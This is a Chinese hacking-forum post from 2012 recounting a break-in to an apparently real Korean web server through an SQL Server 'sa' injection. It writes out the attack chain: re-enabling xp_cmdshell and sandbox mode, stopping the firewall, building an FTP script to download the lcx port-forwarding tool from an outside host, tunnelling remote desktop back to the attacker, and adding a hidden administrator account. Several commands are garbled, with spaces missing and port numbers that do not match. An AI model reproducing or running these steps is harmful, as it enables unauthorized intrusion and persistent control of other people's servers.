sa注入拿服务器权限渗透记录

[复制链接]
查看302 | 回复0 | 2012-4-1 19:18:50 | 显示全部楼层 |阅读模式
下午搞了一个站,sa注入点,window2000+iis5。
通过注入点信息,发现sqlserver版本为7.00,以前见过一次这个版本,不过没有怎么深入研究,朋友扫弱口令扫描到的,当时也提权了,具体忘记怎么提的了。附图。

扫描这个ip地址发现只对外开放了53跟80,韩国的鸟站,由此猜测可能为内网或者外网但是限制了对外开放的端口。一般情况下会开启1433,跟3389的但是限制对外连接。
sqlserver7.0的虽然以前搞过,但是忘记具体怎么弄了,于是一步一步的先用穿山甲自带的功能恢复xp_cmdshell,sp_oa**,sp_***job,还有一个sandboxmode沙盒模式。都开启之后,随便执行set,ipconfig等命令发现没有回显,也不知道哪个组件可以命令。于是想到一个办法。
现在我本机执行lcx-listen 7788通过77端口监听外部来的数据。然后在穿山甲里执行netstopsharedaccess通过xp_cmdshell,然后sp_oa**,sp_***job,沙盒模式一一执行,虽然不知道成功没,但是如果可以执行命令,肯定可以成功,目的是为了是对方机器能对外发送数据。接着跟刚才一样执行telnet我的ip22端口,最终发现通过沙盒模式可以执行命令。



但是对方的3389不允许连接,这时候想通过lcx端口转发来连接对方的3389,虽然不确定是3389但是碰碰运气。
这时候想到一篇文章,sa权限上传九种方法,文章地址。
http://hi.baidu.com/hackxiaolong/blog/item/bdd6cea3316e20a1caefd06c.html
其中的ftp传文件下载文件我亲自测试过,就用这个了。
echoopenwww.ftp.com>ftp.TXT//连接FTP

echousername>>ftp.TXT      //输入用户名

echopassword>>ftp.TXT      //输入密码

echoget lcxc:\lcx.exe>>ftp.TXT//执行下载命令

echobye>>ftp.TXT            //退出

ftp-s:ftp.txt               //执行FTP.TXT文件中的FTP命令

在穿山甲里依次执行以下语句,如果没有特殊情况。lcx就下载到对方机器c盘目录下了。
然后通过沙河模式执行c:/lcx.exe-slave我的ip 77127.0.0.13389
本机执行lcx-listen7788。
过了一小会发现有数据返回,证明lcx已经传上去了,并且将对方3389端口转发到本机上了。


本机再连接127.0.0.1:88,可以连接上终端,然后在穿山甲执行添加用户的命令netuseruserpassword/add
netlocalgroupadministratorsuser/add连接终端,成功登陆。。


中间遇到一些问题就不说了。有什么疑问的可以提出来。
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则